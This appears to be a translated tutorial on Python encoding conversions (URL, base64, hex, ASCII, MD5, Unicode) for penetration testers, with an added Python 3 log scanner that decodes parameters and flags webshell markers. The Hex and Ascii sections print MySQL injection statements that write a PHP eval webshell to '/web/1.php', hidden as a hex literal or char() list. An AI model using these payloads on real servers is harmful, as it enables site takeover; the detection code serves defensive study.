In day-to-day penetration testing, vulnerability research, and even CTF competitions, you run into all kinds of encodings, and often need to convert between them. This article introduces how to do these encoding conversions in Python.
Objective
When I was just getting started, my way of handling an encoding conversion was usually to search Baidu for "URL decoding, base64 encryption, hex ...", or to use the "small Kwai multifunctional conversion tool" software, and later to go straight to the Burp Suite Decoder function, which felt very good. However, there were some problems: online conversion is inefficient (searching takes up 2/3 of the time), and the two tools have some small problems of their own, for example Burp often shows Chinese text garbled.
Until I started using Python as my daily encoding conversion tool ...
Starting the Python conversion tour
URL encoding
URL encoding is the format a browser uses to package form input. It is one of the encodings most familiar to people who work on the web.
>>> from urllib import *
>>> quote("union select null,null,null")
'union%20select%20null%2Cnull%2Cnull'
>>> unquote("union%20select%20null%2Cnull%2Cnull")
'union select null,null,null'
>>> urlencode({'x': '2333', 'y': '666'})
'y=666&x=2333'
Base64
Base64 is often used for parameters in web forms and HTTP transmissions, and messaging protocols often use it to carry user information.
>>> import base64
>>> base64.b64encode("admin")
'YWRtaW4='
>>> base64.b64decode('YWRtaW4=')
'admin'
I remember a CTF contest that required Base32 decoding. The usual websites do not offer online Base32 decoding, so there seemed to be no way to continue. With Python it is as simple as decoding base64, just change the function:
>>> import base64
>>> base64.b32encode('jjjjj')
'NJVGU2TK'
>>> base64.b32decode('NJVGU2TK')
'jjjjj'
Hex
Hex encoding is also a common encoding scheme in web applications. As web security practitioners, we know that a MySQL injection can write a webshell by using hex encoding to bypass the htmlspecialchars() function.
For example:
select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'
Here is how Python implements hex encoding and decoding:
>>> '<?php @eval($_POST[a]); ?>'.encode('hex')
'3c3f70687020406576616c28245f504f53545b615d293b203f3e'
>>>
>>> print '3c3f70687020406576616c28245f504f53545b615d293b203f3e'.decode('hex')
<?php @eval($_POST[a]); ?>
Ascii
The char() function in MySQL converts ASCII codes into characters. Because of this, it can also be used to bypass the htmlspecialchars() function.
For example:
select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile '/web/1.php'
Converting a string to ASCII codes in Python is simple, but the reverse conversion takes a little more work:
>>> map(ord, "<?php phpinfo() ?>")
[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]
>>> print chr(112)
p
>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]
>>> print ''.join(map(chr, l))  # thanks to pcat for pointing out this method
<?php phpinfo() ?>
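The hex literal and char() forms shown in the Hex and Ascii sections hide their content from a plain keyword search of request logs. The following is an added example, not code from the original article, written for Python 3 (the sessions in this article are Python 2): it URL-decodes a logged parameter, expands 0x... literals and char(...) lists, and reports markers that only become visible after decoding. The function names, the marker list and the sample log values are assumptions constructed for the illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL hex literal with an even number of digits, e.g. 0x3c3f...
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
# MySQL char(60, 63, ...) call holding a list of decimal byte values
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)
# Assumed marker list: strings worth alerting on once they become visible
MARKERS = ("<?php", "eval(", "$_post")


def _expand_hex(match):
    return "'" + bytes.fromhex(match.group(1)).decode("latin-1") + "'"


def _expand_char(match):
    codes = [int(n) for n in match.group(1).split(",")]
    if any(c > 255 for c in codes):
        return match.group(0)  # not a byte list, leave it untouched
    return "'" + "".join(map(chr, codes)) + "'"


def normalize(raw_param):
    """URL-decode a logged value, then expand hex literals and char() lists."""
    text = unquote_plus(raw_param)
    text = HEX_LITERAL.sub(_expand_hex, text)
    return CHAR_CALL.sub(_expand_char, text)


def scan(raw_param):
    """Return (normalized text, markers that appear only after decoding)."""
    before = unquote_plus(raw_param).lower()
    decoded = normalize(raw_param)
    hidden = [m for m in MARKERS if m in decoded.lower() and m not in before]
    return decoded, hidden


# Constructed log values: the two statements from this article, URL-encoded,
# plus an ordinary parameter and an odd-length hex value that must not expand.
SAMPLES = [
    "select%200x3c3f70687020406576616c28245f504f53545b615d293b203f3e%20into%20outfile%20'/web/1.php'",
    "select+char(60,63,112,104,112,32,64,101,118,97,108,40,36,95,80,79,83,84,91,97,93,41,59,32,63,62)+into+outfile+'/web/1.php'",
    "page=2&sort=name",
    "id=0x123",
]

if __name__ == "__main__":
    for value in SAMPLES:
        decoded, hidden = scan(value)
        print("ALERT" if hidden else "ok   ", hidden, decoded)
```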
Md5
MD5 is everywhere in the web security community. Because it is irreversible, most websites use MD5 when storing user passwords and other key data. Sometimes a payload we submit needs to be MD5-hashed, and the following method does that easily. For reversing a hash, CMD5 is recommended.
>>> from hashlib import md5
>>> m = md5()
>>> m.update('This is a secret')
>>> m.hexdigest()
'7dbbcee180ba4d456e4aa1cfbdad9c7b'
>>> m.hexdigest()[8:-8]
'80ba4d456e4aa1cf'
Unicode to Chinese
Converting Unicode escapes to Chinese comes up in many situations, especially during penetration testing. Burp has the problem of garbled Chinese text, while in Python the conversion is very simple.
>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"
你需要重新登陆
Summary